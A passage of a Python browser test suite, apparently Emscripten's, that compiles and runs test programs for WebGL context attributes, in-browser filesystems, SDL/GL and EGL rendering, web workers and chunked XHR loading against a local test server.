def test_webgl_context_attributes(self):
# JavaScript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
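# mergeInto(LibraryManager.library, {...}) registers these functions as JS
# library symbols, so the C sources below can call webglAntialiasSupported()
# etc. as ordinary extern functions when built with --js-library.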
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest('webgl_parallel_shader_compile.cpp', '1')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest('webgl_explicit_uniform_location.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
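# addRunDependency('syncfs') holds back main() until the matching
# removeRunDependency call inside the FS.syncfs callback, i.e. the persisted
# IDBFS state is guaranteed to be mounted and synced into memory before the
# program starts.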
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
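# WORKERFS mounts read-only views over the given Blob/File objects (only
# available inside workers) without copying their contents into MEMFS; the
# test presumably reads /work/blob.txt and /work/file.txt and compares them
# against the SECRET defines passed below.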
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
create_file(os.path.join('sub', 'file2.txt'), 'second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
create_file(os.path.join('subdir', 'file2.txt'), '1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
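# force a known byte at a fixed offset; presumably test_lz4fs.cpp checks it to
# verify decompressed content rather than just sizes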
random_data[17] = ord('X')
with open('file3.txt', 'wb') as f:
    f.write(random_data)
# compress in emcc; -s LZ4=1 tells emcc to pass the LZ4 option through to the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. The client receives compressed data and can just use it. This is typical usage.
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
with open('files.js', 'wb') as f:
    f.write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
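# With MODULARIZE, the output js exports a factory function (named `Module`
# by default) instead of running on load, so the page above must call
# Module() explicitly to instantiate the program.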
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
# non-lz4 for comparison (kept disabled):
# try:
#   os.mkdir('files')
# except OSError:
#   pass
# shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
# shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
# shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
# out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
# open('files.js', 'wb').write(out)
# self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])
def test_separate_metadata_later(self):
# see issue #6654: we need to handle separate-metadata both when the packaged
# file loader runs before the main program and when it runs later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
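# FS.createLazyFile makes /bigfile a lazily-fetched file backed by (chunked,
# synchronous) XHRs against the test server, and the print/printErr overrides
# forward the program's stdout/stderr from the worker to the page via
# postMessage; the html above reports the first stdout line as the result.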
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
    try:
        urlopen('http://localhost:11111')
        break
    except Exception:
        print('(sleep for server)')
        time.sleep(1)
else:
    # for/else: reached only if the server never responded within 60 seconds
    raise Exception('chunked XHR test server failed to start')
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
assert 'gl-matrix' not in f.read(), 'Should not include glMatrix when not needed'
@requires_graphics_hardware
def test_glbook(self):
self.emcc_args.remove('-Werror')
programs = self.get_library('glbook', [
os.path.join('Chapter_2', 'Hello_Triangle', 'CH02_HelloTriangle.o'),
os.path.join('Chapter_8', 'Simple_VertexShader', 'CH08_SimpleVertexShader.o'),
os.path.join('Chapter_9', 'Simple_Texture2D', 'CH09_SimpleTexture2D.o'),
os.path.join('Chapter_9', 'Simple_TextureCubemap', 'CH09_TextureCubemap.o'),
os.path.join('Chapter_9', 'TextureWrap', 'CH09_TextureWrap.o'),
os.path.join('Chapter_10', 'MultiTexture', 'CH10_MultiTexture.o'),
os.path.join('Chapter_13', 'ParticleSystem', 'CH13_ParticleSystem.o'),
], configure=None)
def book_path(*pathelems):
return test_file('glbook', *pathelems)
for program in programs:
print(program)
basename = os.path.basename(program)
args = ['-lGL', '-lEGL', '-lX11']
if basename == 'CH10_MultiTexture.o':
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(book_path('Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
args += ['--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga']
elif basename == 'CH13_ParticleSystem.o':
shutil.copyfile(book_path('Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
args += ['--preload-file', 'smoke.tga', '-O2'] # test optimizations and closure here as well for more coverage
self.btest(program,
reference=book_path(basename.replace('.o', '.png')),
args=args)
@requires_graphics_hardware
@parameterized({
'normal': (['-s', 'FULL_ES2=1'],),
# Enabling FULL_ES3 also enables ES2 automatically
'full_es3': (['-s', 'FULL_ES3=1'],)
})
def test_gles2_emulation(self, args):
print(args)
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'basemap.tga'), 'basemap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_10', 'MultiTexture', 'lightmap.tga'), 'lightmap.tga')
shutil.copyfile(test_file('glbook', 'Chapter_13', 'ParticleSystem', 'smoke.tga'), 'smoke.tga')
for source, reference in [
(os.path.join('glbook', 'Chapter_2', 'Hello_Triangle', 'Hello_Triangle_orig.c'), test_file('glbook', 'CH02_HelloTriangle.png')),
# (os.path.join('glbook', 'Chapter_8', 'Simple_VertexShader', 'Simple_VertexShader_orig.c'), test_file('glbook', 'CH08_SimpleVertexShader.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'TextureWrap', 'TextureWrap_orig.c'), test_file('glbook', 'CH09_TextureWrap.png')),
# (os.path.join('glbook', 'Chapter_9', 'Simple_TextureCubemap', 'Simple_TextureCubemap_orig.c'), test_file('glbook', 'CH09_TextureCubemap.png')), # XXX needs INT extension in WebGL
(os.path.join('glbook', 'Chapter_9', 'Simple_Texture2D', 'Simple_Texture2D_orig.c'), test_file('glbook', 'CH09_SimpleTexture2D.png')),
(os.path.join('glbook', 'Chapter_10', 'MultiTexture', 'MultiTexture_orig.c'), test_file('glbook', 'CH10_MultiTexture.png')),
(os.path.join('glbook', 'Chapter_13', 'ParticleSystem', 'ParticleSystem_orig.c'), test_file('glbook', 'CH13_ParticleSystem.png')),
]:
print(source)
self.btest(source,
reference=reference,
args=['-I' + test_file('glbook', 'Common'),
test_file('glbook', 'Common', 'esUtil.c'),
test_file('glbook', 'Common', 'esShader.c'),
test_file('glbook', 'Common', 'esShapes.c'),
test_file('glbook', 'Common', 'esTransform.c'),
'-lGL', '-lEGL', '-lX11',
'--preload-file', 'basemap.tga', '--preload-file', 'lightmap.tga', '--preload-file', 'smoke.tga'] + args)
@requires_graphics_hardware
def test_clientside_vertex_arrays_es3(self):
self.btest('clientside_vertex_arrays_es3.c', reference='gl_triangle.png', args=['-s', 'FULL_ES3=1', '-s', 'USE_GLFW=3', '-lglfw', '-lGLESv2'])
def test_emscripten_api(self):
self.btest('emscripten_api_browser.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_third]', '-lSDL'])
def test_emscripten_api2(self):
def setup():
create_file('script1.js', '''
Module._set(456);
''')
create_file('file1.txt', 'first')
create_file('file2.txt', 'second')
setup()
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
# check using file packager to another dir
self.clear()
setup()
ensure_dir('sub')
self.run_process([FILE_PACKAGER, 'sub/test.data', '--preload', 'file1.txt', 'file2.txt'], stdout=open('script2.js', 'w'))
shutil.copyfile(os.path.join('sub', 'test.data'), 'test.data')
self.btest('emscripten_api_browser2.cpp', '1', args=['-s', 'EXPORTED_FUNCTIONS=[_main,_set]', '-s', 'FORCE_FILESYSTEM'])
def test_emscripten_api_infloop(self):
self.btest('emscripten_api_browser_infloop.cpp', '7')
def test_emscripten_fs_api(self):
